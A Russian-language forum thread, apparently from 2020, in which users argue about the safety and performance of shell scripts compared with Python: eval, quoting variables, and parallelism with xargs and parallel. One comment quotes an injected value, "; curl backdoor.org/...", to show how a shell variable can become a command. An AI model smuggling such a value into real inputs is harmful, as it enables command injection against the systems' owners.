2.45 , InuYasha ( ?? ), 13:28, 08/12/2020 [^] [^^] [^^^] [ответить] + / – Только maximum дырявity, поскольку разделение данные-инструкции очень слабое - т.е. часто переменая может стать командой (если в неё запишут "; curl backdoor.org/...".

3.52 , Аноним ( 49 ), 13:49, 08/12/2020 [^] [^^] [^^^] [ответить] +1 + / – > часто переменая может стать командой (если в неё запишут "; curl backdoor.org/...". Это от криворукости. Разыменование переменной вне двойных кавычек бывает нужно крайне редко и только в тех случаях, когда ты сам эту переменную определил.

4.59 , Аноним ( 16 ), 14:06, 08/12/2020 [^] [^^] [^^^] [ответить] –1 + / – Зато eval нужен очень часто, и ничего ты с этим не сделаешь.

5.74 , Аноним ( 70 ), 14:30, 08/12/2020 [^] [^^] [^^^] [ответить] –2 + / – нет не нужен

6.75 , Аноним ( 16 ), 14:34, 08/12/2020 [^] [^^] [^^^] [ответить] + / – > нет не нужен Наверно твои скрипты совершенно неконфигурируемая лапша из одного харкода, тогда конечно. При определённой сложности скриптов возникает желание предоставить пользователю возможность конфигурировать части логики в своём конфигурационном файле (а заодно избавиться от необходимости постоянно править хардкод). При том хочется его не насиловать его лишний раз, так что да, очень даже нужен.

7.77 , Аноним ( 16 ), 14:39, 08/12/2020 [^] [^^] [^^^] [ответить] + / – А, ещё eval на хештейблы натравливать очень удобно. Хештейблы на порядки удобней альтернатив, особенно когда у тебя неизвестно число параметров. Держать десятки списков в памяти, чтобы отказаться от хэштейблов? Ну, удачи это потом сопровождать.

5.79 , Аноним ( 49 ), 14:42, 08/12/2020 [^] [^^] [^^^] [ответить] + / – > eval нужен очень часто Пишу много скриптов и со всей ответственностью могу сказать, что eval нужен крайне редко. Скорее всего, ты что-то не осилил и сильно усложняешь решение своих задач, если пользуешься им часто.

2.46 , Аноним ( 16 ), 13:36, 08/12/2020 [^] [^^] [^^^] [ответить] + / – До тех пор пока ты не начнёшь ежесекундно спамить тысячами процессов, да и с мультипоточностью пострадать придётся больше чем в питоне (там гил и гц мешают счастью).

3.61 , Аноним ( 32 ), 14:08, 08/12/2020 [^] [^^] [^^^] [ответить] + / – Для этого есть утилиты xargs и parallel, запускал больше тыщи на малине

4.63 , Аноним ( 16 ), 14:16, 08/12/2020 [^] [^^] [^^^] [ответить] + / – > Для этого есть утилиты xargs и parallel, запускал больше тыщи на малине Сколько тысяч процессов при этом вызывал каждый из тысячи процессов? А главное, сколько там было тредов? Когда большая часть времени исполнения уходит на паразитную нагрузку и "бесполезный" бойлерплейт (это что касается xargs и parallel), это всё же ощутимо.

5.65 , Аноним ( 32 ), 14:19, 08/12/2020 [^] [^^] [^^^] [ответить] + / – >Сколько тысяч процессов при этом вызывал каждый из тысячи процессов? А питон так умеет?

6.72 , Аноним ( 16 ), 14:27, 08/12/2020 [^] [^^] [^^^] [ответить] + / – >>Сколько тысяч процессов при этом вызывал каждый из тысячи процессов?

> А питон так умеет? С процессами без проблем, параллелится на сотни (это то что я проверял). С тредами потолок будет раньше, совсем плохо будет если использовать pure python батарейки — там вообще не параллелится практически. Дело как раз в том, что питону не придётся нонстоп вызывать сотни-тысячи программ и ждать их завершения, он сам всё может. А структуры его куда более дружелюбны для данных, вон в шелле даже многомерного массива нет и приходится городить очень неприятные конструкции не эффективные по памяти.

3.64 , Аноним ( 32 ), 14:17, 08/12/2020 [^] [^^] [^^^] [ответить] + / – Ещё бывает сами утилиты поддерживают параллельность, например sort и curl.

